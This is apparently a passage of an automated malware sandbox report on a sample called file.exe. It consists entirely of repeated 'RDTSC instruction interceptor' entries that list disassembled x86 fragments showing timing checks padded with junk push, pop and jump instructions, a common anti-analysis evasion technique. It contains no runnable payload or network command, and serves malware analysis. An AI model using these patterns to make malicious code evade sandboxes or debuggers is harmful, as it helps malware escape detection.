            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE277 second address: FEE284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FD888F38A26h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE536 second address: FEE53A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE53A second address: FEE54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD888F38A2Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE815 second address: FEE81A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE81A second address: FEE820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE820 second address: FEE82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD888D50BE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE94E second address: FEE956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE956 second address: FEE974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD888D50BF7h 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF825D second address: FF826F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD888F38A26h 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF826F second address: FF8273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF703D second address: FF704D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jc 00007FD888F38A26h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7472 second address: FF7478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7478 second address: FF747C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF747C second address: FF74AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BEEh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD888D50BF7h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF74AB second address: FF74B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF74B3 second address: FF74B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF74B8 second address: FF74DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD888F38A35h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FD888F38A26h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF74DF second address: FF7502 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BEBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD888D50BF0h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7502 second address: FF7510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FD888F38A2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7510 second address: FF7517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF78D9 second address: FF78DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF78DF second address: FF78EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FD888D50BE6h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF78EE second address: FF7900 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD888F38A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7A84 second address: FF7A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7C22 second address: FF7C3E instructions: 0x00000000 rdtsc 0x00000002 je 00007FD888F38A2Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD888F38A2Ch 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7C3E second address: FF7C44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7F2A second address: FF7F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7F30 second address: FF7F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7F3A second address: FF7F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD888F38A26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7F46 second address: FF7F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7F51 second address: FF7F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7F57 second address: FF7F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7F5B second address: FF7F5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA67D second address: FFA681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA681 second address: FFA69D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A2Ah 0x00000007 jbe 00007FD888F38A26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA69D second address: FFA6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA6A3 second address: FFA6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA6A7 second address: FFA6AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA6AB second address: FFA6B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA6B5 second address: FFA6BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA6BB second address: FFA6E2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD888F38A26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FD888F38A33h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA6E2 second address: FFA6E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA6E7 second address: FFA6F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A2Ah 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD379 second address: FFD37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD37F second address: FFD385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD4F8 second address: FFD502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD502 second address: FFD508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6AB0A second address: F6AB10 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100147F second address: 100148E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD888F38A26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100148E second address: 10014BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BEBh 0x00000007 jmp 00007FD888D50BEDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f jnc 00007FD888D50BF4h 0x00000015 js 00007FD888D50BEEh 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10018E4 second address: 10018EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007F5C second address: 1007F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007F63 second address: 1007F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007F6E second address: 1007F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007F72 second address: 1007F7F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F607A9 second address: F607C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jno 00007FD888D50BF9h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006915 second address: 1006919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006CEA second address: 1006CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006CEE second address: 1006CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006CF2 second address: 1006D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD888D50BE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006D04 second address: 1006D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006D08 second address: 1006D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF963 second address: FAF967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF967 second address: FAF96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFAAF second address: FAFAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007289 second address: 100728D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100728D second address: 1007293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C3F8 second address: 100C415 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD888D50BF2h 0x00000008 pushad 0x00000009 je 00007FD888D50BE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C415 second address: 100C446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD888F38A2Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD888F38A33h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C446 second address: 100C44A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C44A second address: 100C45D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C45D second address: 100C475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD888D50BF4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6C63D second address: F6C64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD888F38A26h 0x0000000a js 00007FD888F38A26h 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BF87 second address: 100BF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BF8B second address: 100BFA4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FD888F38A26h 0x0000000e jmp 00007FD888F38A2Bh 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BFA4 second address: 100BFC7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD888D50BE6h 0x00000008 ja 00007FD888D50BE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD888D50BEBh 0x00000017 ja 00007FD888D50BE6h 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013896 second address: 101389B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101389B second address: 10138A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1014B31 second address: 1014B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FD888F38A32h 0x0000000f jmp 00007FD888F38A38h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1014B68 second address: 1014B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BEBh 0x00000007 pushad 0x00000008 jp 00007FD888D50BE6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101517C second address: 1015180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101544E second address: 1015452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019AF8 second address: 1019B02 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD888F38A2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019B02 second address: 1019B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019B0A second address: 1019B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019B0E second address: 1019B2C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD888D50BE6h 0x00000008 jc 00007FD888D50BE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007FD888D50BEAh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019B2C second address: 1019B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019B32 second address: 1019B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019C6F second address: 1019C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD888F38A36h 0x0000000d pop edi 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019C8E second address: 1019C94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019C94 second address: 1019C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019C9A second address: 1019CAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FD888D50BE6h 0x0000000e jnl 00007FD888D50BE6h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019CAE second address: 1019CC1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnl 00007FD888F38A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019CC1 second address: 1019CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A15C second address: 101A165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A2BF second address: 101A2C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A6D9 second address: 101A6DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F9F5 second address: 101F9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F9FA second address: 101FA00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FA00 second address: 101FA1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10290B0 second address: 10290B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027236 second address: 102723C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102723C second address: 102724B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 jns 00007FD888F38A26h 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10273B2 second address: 10273B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102766E second address: 1027674 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
